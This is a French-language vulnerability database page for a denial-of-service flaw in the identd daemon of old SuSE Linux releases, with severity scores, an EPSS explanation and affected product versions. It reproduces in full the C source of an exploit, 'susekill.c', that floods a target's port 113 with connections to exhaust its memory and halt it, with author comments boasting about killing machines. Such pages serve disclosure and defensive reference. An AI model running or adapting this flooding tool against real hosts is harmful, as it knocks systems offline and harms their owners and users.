Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
A default configuration of in.identd in SuSE Linux waits 120 seconds between requests, allowing a remote attacker to conduct a denial of service.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 5 | AV:N/AC:L/Au:N/C:N/I:N/A:P | [email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 19463
Date de publication : 1999-08-15 22h00 +00:00
Auteur : friedolin
EDB Vérifié : Yes
// source: https://www.securityfocus.com/bid/587/info
In the inetd.conf under certain distributions of SuSE Linux the in.identd daemon is started with the -w -t120 option. This means that one identd process waits 120 seconds after answering the first request to answer the next request. If a malicious remote attacker starts a large number of ident requests in a short period of time it will force the target machine to start multiple daemons because the initial daemon is in a time wait state. This can eventually lead the machine to starve itself of memory resulting essentially in a machine halt.
/* susekill.c by friedolin
*
* used to kill lame SuSE Linux boxes with identd running
* identd must be started with -w -t120 to crash a machine
*
* have fun, friedolin <[email protected]>
*
* based on gewse.c by napster
*/
/* Tested systems:
*
* vulnerable:
*
* SuSE-Linux 4.4 - 6.2
* Slackware 3.2 and 3.6
*
* not vulnerable:
*
* RedHat 5.0 - 6.0
* Debian 2.0 - 2.1
*
* not tested:
*
* pre 4.3 SuSE systems
* pre 5.0 RedHat
* pre 2.0 Debian
* other Slackware releases
* Caldera Open Linux, ...
*
* please send me your results and experiences !
*
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#define GETIDENT "1027, 6667 : USERID : UNIX : killsuse"
int sockdesc;
int portkill;
int numkill;
int x;
void usage(char *progname)
{
printf("susekill by friedolin (based on gewse.c)\n");
printf("usage: %s <host> <# of connections>\n",progname);
exit(69);
}
main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *he;
if (argc<3) usage(argv[0]);
sin.sin_port = htons(113);
sin.sin_family = AF_INET;
he = gethostbyname(argv[1]);
if (he) {
sin.sin_family = AF_INET;
sin.sin_port = htons(113);
memcpy((caddr_t)&sin.sin_addr.s_addr, he->h_addr, he->h_length);
} else {
perror("resolving");
}
numkill = atoi(argv[2]);
printf("Flooding %s [%s] identd %d times.\n", argv[1], inet_ntoa(sin.sin_addr.s_addr), numkill);
printf("Killing");
fflush(stdout);
for (x=1;x<=numkill;x++) {
sockdesc = socket(AF_INET, SOCK_STREAM, 0);
if (sockdesc < 0) {
perror("socket");
exit(69);
}
if (connect(sockdesc, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
perror("connect");
exit(69);
}
printf(" .");
fflush(stdout);
(void) write(sockdesc, GETIDENT, strlen(GETIDENT));
}
printf("\n");
}
Products Mentioned
Configuraton 0
Slackware>>Slackware_linux >> Version 3.2
Slackware>>Slackware_linux >> Version 3.6
Suse>>Suse_linux >> Version 4.4
- Suse>>Suse_linux >> Version 4.4 (Open CPE detail)
Suse>>Suse_linux >> Version 4.4.1
- Suse>>Suse_linux >> Version 4.4.1 (Open CPE detail)
Suse>>Suse_linux >> Version 5.0
- Suse>>Suse_linux >> Version 5.0 (Open CPE detail)
Suse>>Suse_linux >> Version 5.1
- Suse>>Suse_linux >> Version 5.1 (Open CPE detail)
Suse>>Suse_linux >> Version 5.2
- Suse>>Suse_linux >> Version 5.2 (Open CPE detail)
Suse>>Suse_linux >> Version 5.3
- Suse>>Suse_linux >> Version 5.3 (Open CPE detail)
Suse>>Suse_linux >> Version 6.0
- Suse>>Suse_linux >> Version 6.0 (Open CPE detail)
Suse>>Suse_linux >> Version 6.1
- Suse>>Suse_linux >> Version 6.1 (Open CPE detail)
- Suse>>Suse_linux >> Version 6.1 (Open CPE detail)
Suse>>Suse_linux >> Version 6.2
- Suse>>Suse_linux >> Version 6.2 (Open CPE detail)
Références
2025©
tesweb SA
